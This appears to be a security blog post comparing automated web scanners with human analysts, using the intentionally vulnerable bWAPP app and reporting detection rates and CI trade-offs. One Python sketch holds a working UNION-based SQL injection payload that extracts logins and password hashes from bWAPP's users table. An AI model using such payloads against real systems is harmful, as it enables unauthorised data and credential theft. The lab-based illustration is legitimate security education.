Person playing chess against a robotic arm

Will machines replace us?

Automated detection vs. manual detection
Vulnerability detection by an automated tool is not enough to conclude that an app is secure. The knowledge and experience of a person are still necessary to complement the analysis and achieve an effective, detailed evaluation of the security of said application.

More than 20 years have passed since Garry Kasparov, the chess world champion, was defeated by Deep Blue, the supercomputer designed by IBM. For many people, that event was proof that machines had managed to exceed human intelligence [1]. This belief raised many doubts and concerns about technological progress, ranging from workers worried about their jobs to fears, fueled by Hollywood, that the apocalypse was coming and machines would conquer and oppress our world.

Leaving all fiction aside, the first concern was well grounded and made some sense. Each year we witness new machines enter the market with the ability to complete a task with a precision and speed capable of outdoing tens of experienced workers. By machine we do not mean a robot with the appearance of a young Arnold Schwarzenegger wearing sunglasses; it could be any device programmed to complete a specific task.

Self-driving cars, robotic arms that minimize costs and increase the efficiency of a process and, in the field of Information Security, tools that can detect errors and vulnerabilities in a web app. What can we, information security specialists, expect from all of this? Are we becoming more and more expendable?

Robot holding a firearm with an explosion in the background
Figure 1. The inevitable outcome that Hollywood shows us

Fortunately, our future does not look so bleak. Even though there are many powerful automated tools for vulnerability detection in web applications, the human role is still vital if a detailed and effective security analysis is desired. There are still situations in which we have the upper hand:

  • Tools can have knowledge of many vulnerabilities, know how to find them and what risk level they imply. However, they lack the human factor: the malice that comes with experience, that instinct which allows a security analyst to identify which vulnerabilities can be combined to create a more critical attack vector. Malice can also allow a person to find vulnerabilities a machine may overlook.

  • Yes, analyzers generate a report with all their findings and their criticality but, how complete is that report? It tells you how many input fields are affected by a vulnerability but, does it tell you which of those inputs allow the extraction of sensitive data? Does it tell you how to take advantage of a form in order to modify the database? Sadly, the answer is no; automated tools only determine the existence of a flaw. The "how" that flaw can be exploited and leveraged in an attacker's favor to affect a particular business scenario is strictly a human ability, acquired thanks to the malice we previously mentioned (the sketch after this list illustrates the difference).

  • False positives, perhaps an analyzer's greatest flaw, are reports of vulnerabilities that, in reality, do not exist [2]. This is a very common problem among these tools, and it results from their inability to actually exploit the flaw they report. A tool that does not properly filter out false positives can do more harm than good. If it was used to avoid the cost of hiring a security professional, you now have X vulnerabilities reported and no idea which of those X are false positives. The task of filtering them out now falls on the developer, someone who does not necessarily master the topic of security. Was the remedy worse than the illness?

    False positives are also one of the reasons why these tools are not commonly used in Continuous Integration environments. If we program an integrator to check every change made to the source code, and to stop the deployment of the app when an error is found, false positives could make deploying the app a pain in the behind (we sketch such a gate later in this article).

  • Netsparker (the developer of one of these tools) agrees with this position [3]: no analyzer is capable of detecting all of the vulnerabilities classified among the Top 10 most critical. The company concludes that an analyzer cannot determine whether an application is working as intended, whether it is aligned with the company's objectives, whether sensitive information (which can vary depending on the type of business) is being properly protected, whether users' privileges are being properly assigned, and many other cases where human reasoning must make the final decision.
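To make that first distinction concrete, here is a minimal sketch of the step a scanner never takes: turning a reported injection point into actual data extraction. It assumes a local bWAPP instance and follows its SQL injection (search) exercise; the endpoint, cookie names, column count and table names reflect bWAPP's default setup and may differ in your deployment.

```python
# verify_sqli.py -- a sketch of what the analyst does after a scanner says
# "the 'title' parameter is injectable": actually extract sensitive data.
# Assumptions: local bWAPP install, its SQLi (search) exercise at sqli_1.php,
# a 7-column query on 'movies' and a 'users' table -- adjust to your setup.
import requests

BASE = "http://localhost/bWAPP"  # assumed deployment URL
COOKIES = {
    "PHPSESSID": "your-session-id",  # taken from a logged-in browser session
    "security_level": "0",           # bWAPP's lowest protection level
}

# The scanner stops at "injectable". The analyst goes one step further:
# a UNION payload that pulls logins and password hashes out of the database.
payload = "' UNION SELECT 1, login, password, 4, 5, 6, 7 FROM users-- -"

resp = requests.get(
    f"{BASE}/sqli_1.php",
    params={"title": payload, "action": "search"},
    cookies=COOKIES,
    timeout=10,
)

# If credentials appear in the HTML, the flaw is not just present but
# demonstrably exploitable -- the "how" that a report alone does not give.
print("credentials leaked" if "bee" in resp.text else "payload needs tuning")
```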

Our goal is not to take merit away from these tools; we use many of them in our professional lives and they are very strong allies. What we want is to correct the mistaken belief that they are sufficient to decide whether a web app is secure or not.

To do this, we developed our own experiment. We used the insecure web application bWAPP and the automated analyzers W3af, Wapiti and OWASP ZAP. All three are open source and can be executed from the command line, which makes it possible to use them in a Continuous Integration environment. For bWAPP, we assumed a total of 170 vulnerabilities, based on the results published by the company that developed the app [4]. Let's see how our contestants performed:

Table 1. bWAPP Vulnerability Analysis

Tool      | Detected | % Not Detected | Time (hh:mm:ss)
----------|----------|----------------|----------------
W3af      | 28       | 83.5%          | 00:02:30
Wapiti    | 26       | 84.7%          | 00:02:00
ZAP-Short | 42       | 75.3%          | 00:19:00
ZAP-Full  | 59       | 65.3%          | 01:30:00

In the table above, ZAP-Short refers to the ZAP tool with only the XSS and SQLi plugins enabled, while ZAP-Full refers to the same tool with all of its plugins enabled. It is important to note that the application's authentication had to be disabled so that the tools could work properly from the command line. This not only takes the experiment further away from reality, but also leaves a layer of the web app unanalyzed.
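As a sanity check, the "% Not Detected" column follows directly from the raw counts and the 170 vulnerabilities assumed for bWAPP; a few lines of Python reproduce it:

```python
# Reproducing the "% Not Detected" column of Table 1 from the raw counts
# and the 170 vulnerabilities assumed for bWAPP [4].
TOTAL = 170
detected = {"W3af": 28, "Wapiti": 26, "ZAP-Short": 42, "ZAP-Full": 59}

for tool, found in detected.items():
    print(f"{tool:<9} {100 * (TOTAL - found) / TOTAL:.1f}% not detected")
# W3af      83.5% not detected
# Wapiti    84.7% not detected
# ZAP-Short 75.3% not detected
# ZAP-Full  65.3% not detected
```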

Another important detail is that the analyzers were not aimed at the main site, as a real test would be. The target of the attack was a specific bWAPP page where links to all the other pages are listed; this way, the tools could identify every page. bWAPP uses forms to reach all other pages, which is why aiming the attack at the main page would result in zero sites of interest being found. There are tools, such as Burp, that solve this problem by evaluating the forms [5], but others fail in the same situation due to their inability to navigate the main site (the sketch below shows why).
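To see why a link-only spider comes up empty on a form-driven page, consider this minimal sketch; the HTML fragment is a simplified stand-in for bWAPP's menu, not its actual markup:

```python
# why_zero_pages.py -- a sketch of the crawling limitation described above:
# a spider that only follows <a href> links finds nothing of interest on a
# page (like bWAPP's menu) that exposes its content through a <form>.
from html.parser import HTMLParser

class NaiveSpider(HTMLParser):
    """Collects <a href> targets and nothing else -- forms are invisible."""
    def __init__(self):
        super().__init__()
        self.links, self.forms = [], []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and "href" in attrs:
            self.links.append(attrs["href"])
        elif tag == "form":
            self.forms.append(attrs.get("action", "?"))

# Simplified stand-in for bWAPP's main page: the vulnerable pages are
# reachable only by submitting the selection form.
MAIN_PAGE = """
<form action="portal.php" method="post">
  <select name="bug"><option value="sqli_1.php">SQL Injection</option></select>
  <button type="submit">Hack</button>
</form>
"""

spider = NaiveSpider()
spider.feed(MAIN_PAGE)
print(f"links found: {len(spider.links)}")    # 0 -> scanner sees no targets
print(f"forms ignored: {len(spider.forms)}")  # 1 -> where the real pages are
```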

To facilitate the analysis of the results, let's take the best result (ZAP-Full) and the worst one (Wapiti) and compare them against the whole attack surface of the application to see what coverage was achieved.

Coverage comparison between two analyzers with the scope of an application
Figure 2. Visual representation of the best and worst results from Table 1: ZAP-Full and Wapiti

We can see that even the best of the tools we used left out over half of the vulnerabilities, and false positives may exist among the ones that were found. It also took an hour and a half to finish the analysis, a time that is not appropriate for a Continuous Integration environment.
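For completeness, here is the pipeline gate promised earlier: a sketch of what wiring one of these scanners into Continuous Integration could look like. The Wapiti flags and the JSON report fields are based on Wapiti 3 and should be verified against your installed version; note how every finding, true or false, blocks the deployment until a human triages it.

```python
# ci_scan.py -- a sketch of a naive Continuous Integration gate: run the
# scanner, break the build if any finding comes back. Flags and report
# fields follow Wapiti 3; verify them against your installed version.
import json
import subprocess
import sys

TARGET = "http://staging.example.com/bWAPP/"  # assumed staging URL

scan = subprocess.run(
    ["wapiti", "-u", TARGET, "-f", "json", "-o", "wapiti-report.json"],
    capture_output=True,
    text=True,
)
if scan.returncode != 0:
    print(scan.stderr, file=sys.stderr)
    sys.exit(scan.returncode)  # the scan itself failed; do not deploy blind

with open("wapiti-report.json") as f:
    report = json.load(f)

# Count findings across all vulnerability categories in the report.
findings = sum(len(hits) for hits in report.get("vulnerabilities", {}).values())
print(f"{findings} findings reported")

# Naive gate: any finding stops the deployment -- which is exactly where
# unfiltered false positives turn the pipeline into a bottleneck.
sys.exit(1 if findings else 0)
```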

A developer who wishes to reduce costs by avoiding the hiring of a security analyst, and who depends solely on automated tools, would remediate the reported vulnerabilities and acquire a false sense of security, unaware that more than half of the flaws are still present, just waiting to be found and exploited by a malicious user. This way, the resources that were saved during development will be spent, with interest, in the production stage.

Conclusions

Yes, the rivalry between humans and machines has been present for a long time now, and it will remain so for a long time to come. However, it is not necessary to see it as a rivalry in every aspect. In the field of Information Security, more than a rivalry, a complementary relationship can exist, where the tool helps the analyst by performing the repetitive tasks faster, and the analyst adds his/her instinct and experience to detect the maximum number of vulnerabilities in an efficient manner, thereby giving a greater sense of security and satisfaction to web application developers.

Paraphrasing Garry Kasparov in his TED talk [6], where he uses as an example a freestyle chess tournament in which amateur players with three ordinary computers defeated chess grandmasters and supercomputers: the relationship between human and machine, through an effective process, is the perfect recipe to achieve our grandest dreams.

Handshake between a human and a robot
Figure 3. Alternative outcome to the human-machine relationship


Andrés Cuberos Lopera

Electronic Engineer

Enjoys the small things in life, like a good beer, music and sleep

